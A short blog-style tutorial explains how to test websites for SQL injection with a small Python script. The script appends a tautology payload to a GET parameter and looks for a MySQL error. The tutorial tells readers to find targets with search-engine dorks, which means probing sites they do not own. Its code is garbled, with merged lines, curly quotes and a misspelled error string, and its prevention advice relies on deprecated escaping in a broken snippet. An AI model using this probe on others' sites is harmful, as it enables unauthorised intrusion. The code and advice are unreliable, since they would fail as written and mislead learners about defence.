Checking Vulnerability Sql Injection with Simple Code using Python - Will discuss how to check the SQL injection security hole in a website using a simple code with a python.
It only uses the GET parameters on the website
dependencies:
- python 3.4 or latest
- Internet Connection
- Vulnerability a Website
- Computer with Linux or Windows (here using Linux)
If you’re not install python, you can download python in http://python.org/downloads
A Glimpse Of Python
Python is written in C, it is one of the easiest programming languages to hacking tools, it includes a lot of very useful libs.
Finding Vuln Website For Testing
To find a website for testing using simple sqli dorks, like {inurl:”index.php?cat_id=”}.
This Simple Code Sqli To Check For Vulnerabilities
Before starting, create new file with format .py e.g: sqli.py
After that, then copy this code to a file that has been created:
import sys
import urllib
import urllib.requestfullurl = input(“Please specify the vulnerable url: “)
resp = urllib.request.urlopen(fullurl + “=1\’ or \‘1\’ = \‘1\’”)
body = resp.read()
fullbody = body.decode(‘utf-8’)if “You have an error in you SQL syntax” in fullbody:
print (“The website is classic SQL injection vulnerable!”)
else:
print (“The website is not classic SQL injection vulnerable!”)
Save and running with command $python sqli.py
How to prevent simple SQL injection
Preventing SQLi ON MYSQL if very simple. Just use mysql_real_escape string for queries, as example:
$query = sprintf(“SELECT * FROM users where user=’%s’ AND password=’%s’,
mysql_real_escape_string($username)
mysql_real_escape_string($password)
Thanks